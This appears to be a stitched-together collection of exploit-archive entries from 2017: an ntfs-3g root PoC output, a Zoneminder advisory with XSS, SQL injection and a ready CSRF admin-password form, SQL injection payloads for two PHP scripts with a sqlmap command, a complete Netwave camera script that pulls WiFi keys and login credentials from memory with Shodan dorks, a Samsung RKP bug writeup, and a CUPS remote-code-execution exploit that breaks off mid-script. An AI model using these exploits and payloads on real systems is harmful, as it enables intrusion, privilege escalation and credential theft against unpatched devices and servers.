@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:` '@# @@ #` : `'@ :@@' # `@` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== FOXMOLE - Security Advisory 2016-07-05 ===
Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
Zoneminder 1.29,1.30
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protection
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID:
OVI-ID:
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Impact
======
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding.
This means user supplied input is inserted in an unsafe way.
This could allow a remote attacker to easily compromise user accounts or access the database in an unsafe way.
Issue Description
=================
The following findings are only examples there are quite more. The whole application should be reviewed.
All items tested using Firefox
1)Cross Site Scripting (XSS)
Reflected: http://192.168.241.131/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
Reflected without authentication: http://192.168.241.131/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
Stored: Creating a new monitor using the name "Bla<script>alert(1)</script>". There is only a clientside protection.
2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easy exploitable using sqlmap.
3)Session Fixation
After a successful authentication the Session Cookie ZMSESSID remains the same.
Example: Cookie before the login = ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2 after successful login
ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2
4)No CSRF Proctection
A possible CSRF attack form, which changes the password of the admin (uid=1), if the corresponding user activates it.
<html>
<body>
<form action="http://192.168.241.131/zm/index.php" method="POST">
<input type="hidden" name="view" value="user" />
<input type="hidden" name="action" value="user" />
<input type="hidden" name="uid" value="1" />
<input type="hidden" name="newUser[MonitorIds]" value="" />
<input type="hidden" name="newUser[Username]" value="admin" />
<input type="hidden" name="newUser[Password]"
value="admin1" />
<input type="hidden" name="conf_password" value="admin1" />
<input type="hidden" name="newUser[Language]" value="" />
<input type="hidden" name="newUser[Enabled]" value="1" />
<input type="hidden" name="newUser[Stream]" value="View" />
<input type="hidden" name="newUser[Events]" value="Edit" />
<input type="hidden" name="newUser[Control]" value="Edit" />
<input type="hidden" name="newUser[Monitors]" value="Edit" />
<input type="hidden" name="newUser[Groups]" value="Edit" />
<input type="hidden" name="newUser[System]" value="Edit" />
<input type="hidden" name="newUser[MaxBandwidth]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Temporary Workaround and Fix
============================
FOXMOLE advises to disable Zoneminder until the vendor publishes a complete fix.
History
=======
2016-07-05 Issue discovered
2016-11-22 Vendor contacted, no response
2016-12-16 Vendor contacted again, still no response
2017-01-17 Vendor contacted --> working on a patch
2017-01-22 Vendor contacted, asked for an update and
declare advisory release to 2017-02-02 --> no response
2017-02-02 Advisory Release
GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEjrQMZqTYqiY2IftqOBIJIZnjJ3wFAliS758ACgkQOBIJIZnj
J3y4Wg//fi1TrOCwVX4DemeKv2Wm4bf+sBlxhyWX6KRolylHYiReSuID+mAZvYyD
UDMQkWcHKzDXTZKvkNXB6h70r3x/pKKR7SmlaNfFDeCbEgChzDaxCmlzcOaXIzSy
D5S0quuT2OdpQmvMWtrMbJrqdP8I3AW5WJt2F5uc796eUEo9HZZuIC8MxzlzKdgR
dLWyE3fPghECsPBFxstGS9M6iUHnQALYAf7KBVnQmDiidNpCRNzUx8l4YolejBT4
8aGfiQZFJDS8caR0NWWpf0stIayJNVCcxziaRAXyf8BkuHQIK5Ccpfy2q1V4hvWw
tn1p7M8hrY+U1mhH6R8zpK+kcZ2WEvUQd4OCJ5fRB9zo+WFK3Hpr/z1iPTA8TPmd
0y3wwyQOmN1rzIwBEoKpRbPXKwK1bgXn9pwVYPOg7aapaePxtWQXL3zihN4BSQNw
NVXHwuNxCCXH9NLB65MC4mopKPq+alVZUj2IJjDp0DuCP4lG2FFiVkUaf49tV0Mg
8f5GUTYuQCQsa8/acpm4NF40Y/vkaJ7SBzJ8T8j5TDqegnhbdEWlp5Ydx/Z2+Gb7
c6ZYeWxNmsShm01yBw0id75hANKdLBUdNdxTXjxvqryQx7kXQ7ua5TA9m4a0378c
3CBpM2Bor0RtFkhedLLRW4p+8aNUSYuj83ExNAbYk6ZkmcZ2q0E=
=kFiq
-----END PGP SIGNATURE-----
# Exploit Title : Itech Multi Vendor Script - Multiple SQL Injections
# Author : Yunus YILDIRIM (Th3GundY)
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website : http://www.yunus.ninja
# Contact : yunusyildirim@protonmail.com
# Vendor Homepage : http://itechscripts.com/
# Software Link : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version : 6.49
# Demo : http://multi-vendor.itechscripts.com
# # # # DETAILS # # # #
SQL Injections :
# 1
http://localhost/quickview.php?id=10
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 9776=9776
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10 AND SLEEP(5)
# 2
http://localhost/product.php?id=9
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 9693=9693
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=9 AND SLEEP(5)
# 3
http://localhost/product_search.php?search=Adidas
Parameter: search (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search=Adidas%' AND SLEEP(5) AND '%'='
# 4
http://localhost/product_search.php?category_id=1
Parameter: category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1 AND 8225=8225
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1 AND SLEEP(5)
# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
Parameter: sub_sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)
# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
Parameter: sub_category_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: category_id=1&sub_category_id=1 AND 5242=5242
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
#!/usr/bin/python2.7
##
## spiritnull(at)sigaint.org
##
## Run the exploit against the victim to get WIFI password
## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin
##
## magic for you bash:
## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
## wget -qO- http://[HOST]:[PORT]//dev/rom0
## wget -qO- http://[HOST]:[PORT]/get_status.cgi
##
## shodan dork:
## "Server: Netwave IP Camera"
##
## zoomeye dork:
## Netwave IP camera http config
##
import sys,os,time,tailer
import urllib2
import subprocess
import signal
from threading import Thread
try:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
print "Usage: python pownetwave.py [HOST]:[PORT]"
print "Example: python pownetwave.py 127.0.0.1:81"
sys.exit(0)
else:
pass
except IndexError:
print "Usage: python pownetwave.py [HOST]:[PORT]"
print "Example: python pownetwave.py 127.0.0.1:81"
sys.exit(0)
def signal_handler(signal, frame):
print('\nclearing up..')
os.system("rm -rf tmpstream.txt")
os.system("rm -rf tmpstrings.out")
os.system("killall -9 wget")
os.system("killall -9 tail")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
macaddr = ""
done = 0
linecount = 0
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
print "getting system information.."+sys.argv[1]
response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi')
xcontent = response.read().split(";\n")
for line in xcontent:
if line.startswith("var id="):
line = line.split("'")
macaddr = line[1]
else:
pass
print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC
print "getting wireless information.."
try:
resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat")
xcontent = resp.read().split("\n")
print "victims wireless information.."
for line in xcontent:
if line.startswith("WPAPSK") or line.startswith("SSID"):
print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC
else:
print "\t\t"+str(line)
except:
print "wireless lan is disabled.."
print "checking for memory dump vulnerability.."
try:
urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore')
except:
print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC
sys.exit(0)
print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC
while 1:
sys.stdout.flush()
if os.stat('tmpstrings.out').st_size <= 1024:
sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
else:
sys.stdout.flush()
print "strings in binary data found.. password should be around line 10000"
for line in tailer.follow(open('tmpstrings.out','r')):
sys.stdout.flush()
if done == 0:
linecount+= 1
if line == macaddr:
sys.stdout.flush()
done = 1
print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
else:
sys.stdout.write(str(linecount)+"\r")
elif done == 1:
done = 2
print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 2:
done = 3
print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 3:
done = 4
print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC
elif done == 4:
done = 0
print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC
else:
pass
signal.pause()
Exploit Title: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection
Date: 03.02.2017
Vendor Homepage: http://slimar.org
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
SlimarUSER is a PHP user management system full with features. The system allows website owners to manage their own users with complete login, registration and many other features. It can be used on its own, or integrated into any existing PHP powered website.
Sqlmap command: sqlmap.py -u "http://locahost/userman/inbox.php?p=view&id=7" --cookie="PHPSESSID=de3052c5dbb1d535d423ee1a2dbb076b; id=4; password=%242y%2410%24UuYt6q5GXU5UO37xc3j3GeN2ZM1hHB1sWqsAMs1DXAoeewSH.WYgq" --batch --random-agent --dbms=mysql
Vulnerable Url: http://locahost/userman/inbox.php?p=view&id=[payload]
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
During the initialization of RKP, a special command can be issued by EL1 kernel in order to mark the RKP read-only page as such in the stage 2 translation table. This command, "rkp_set_init_page_ro" (command code 0x51) has the following approximate high-level logic:
__int64 rkp_set_init_page_ro(struct args* args_buffer)
{
unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
{
if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
}
else
{
rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
}
rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
return rkp_set_pgt_bitmap(page_pa, 0);
}
As we can see above, the function receives an address in the kernel VAS, and converts it to a physical address by adding a constant offset to it (the virt_to_phys offset for the kernel VAS). Then, the function proceeds to mark the resulting physical address as read-only and non-executable in the stage 2 translation table. Finally, the function proceeds to unset the bit in the RKP page-table bitmap corresponding to the given address. This is meant to indicate to EL1 that the address is protected by a stage 2 mapping.
However, the function fails to validate the bounds of the given virtual address (or the resulting physical address). This means that an attacker can supply any arbitrary address and the function will accept it as valid input. Similarly, the implementation of "rkp_set_pgt_bitmap" performs no such validations:
signed __int64 __fastcall rkp_set_pgt_bitmap(__int64 phys_addr, unsigned char set_or_unset)
{
unsigned long phys_off = phys_addr - 0x80000000LL;
unsigned long bitmap_index = (phys_off >> 18) & 0x3FFFFFFFFFFFLL;
if ( !rkp_pgt_bitmap )
return 0LL;
unsigned long bit_offset = (phys_off >> 12) & 0x3F;
if ( set_or_unset & 0x80 )
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) |= 1LL << bit_offset;
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
else
{
spin_lock(&rkp_bitmap_spinlock);
*(rkp_pgt_bitmap + 8 * bitmap_index) &= ~(1LL << bit_offset);
spin_unlock(&rkp_bitmap_spinlock);
result = 1LL;
}
return result;
}
The RKP page-table bitmap is only 0x20000 bytes large (each bit denotes a 4KB page, resulting in a supported range of at-most 0x100000000 bytes). The base physical address for the bitmap is the physical base address for the kernel range - 0x80000000.
This means that if an attacker supplies any virtual address that is converted to a physical address not in the range of 0x80000000-0x180000000, the resulting "bitmap_index" will not be within the bitmap's bounds, causing the function to modify a bit out-of-bounds.
An attacker can use this in order to specifically craft an input virtual address so that the resulting calculated "bitmap_index" will have any arbitrary value, thus resulting in a modification at an arbitrary offset from the base of the page-table bitmap, within the context of RKP.
As the bitmap resides directly before RKP's code, an attacker can trivially use this primitive in order to modify the code or data pages belonging to RKP, thus gaining privilege escalation from EL1 to the context of RKP.
I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
Proof of concept for the RKP memory corruption in "rkp_set_init_page_ro".
This PoC modifies an instruction within RKP's address space by repeatedly calling "rkp_set_init_page_ro" with faulty input addresses.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *
def banner():
print '''
lol ty google
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target IPP service port\n"
" -c, --lib /path/to/payload.so\n"
" -f, --stomp-only Only stomp the ACL (no postex)\n"
"\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 631 -f\n"
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
class tcpsock:
def __init__(self, sock=None):
if sock is None:
self.sock = socket(
AF_INET, SOCK_STREAM)
self.sock.settimeout(30)
else:
self.sock = sock
def connect(self, host, port):
self.sock.connect((host, int(port)))
def tx(self, msg):
self.sock.send(msg)
def rx(self):
tmp = self.sock.recv(1024)
msg = ""
while tmp:
msg += tmp
tmp = self.sock.recv(1024)
return msg
def txrx (ip, port, proto, txpacket):
if (proto is "tcp"):
sock = tcpsock()
elif (proto is "udp"):
sock = udpsock()
else:
return None
sock.connect(ip, port)
sock.tx(txpacket)
rxpacket = sock.rx()
return rxpacket
def locatePrinters(rhost, rport="631"):
request = ( "GET /printers HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
response = txrx(rhost, int(rport), "tcp", request)
if response is not None:
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
if m is not None:
printer = m.group(1)
pretty("+","printer found: " + printer)
return printer
else:
pretty("-","no printers")
exit(1)
else:
pretty("-","no printers")
exit(1)
def preparePayload(libpath):
with open(libpath, 'rb') as f:
payload = f.read()
if payload is not None:
pretty("*","Payload:\n" + createDump(payload))
else:
pretty("-","something went wrong")
usage()
return payload
def seedTarget(rhost, rport, printer, payload):
i = random.randint(1,3)
reqid = str(pack(">i",(i+2)))
reqid2 = str(pack(">i",(i+3)))
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer
create_job_packet = ("\x02\x00"
"\x00\x05"+
reqid+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
"\x02"
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
"\x03")
pretty("*","Sending createJob")
http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
createJobRequest = http_header1 + create_job_packet
blah = txrx(rhost,int(rport),"tcp",createJobRequest)
if blah is not None:
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
if m is not None:
jobid = m.group(1)
else:
pretty("-","something went wrong");
exit()
pretty("*","\n" + createDump(blah) + "\n")
pretty("*", "Sending sendJob")
send_document_packet = ("\x02\x00"
"\x00\x06"+
reqid2+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
"\x03"+
payload)
http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
sendJobRequest = http_header2 + send_document_packet
blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
pretty("*","\n" + createDump(blah) + "\n")
pretty("*","job id: " + jobid)
return jobid
def stompACL(rhost, rport, printer):
i = random.randint(1,1024)
printer_url = "ipp://" + rhost + ":" + rport + printer
admin_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+1)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x06" # val len: 6
"/admin"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x06" # val len: 6
"/admin"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x16" # val len: 22
"\x00\x06" # length
"/admin"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
conf_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+2)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x1b" # val len: 27
"\x00\x0b" # length
"/admin/conf"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
"\x0d\x0a")
http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
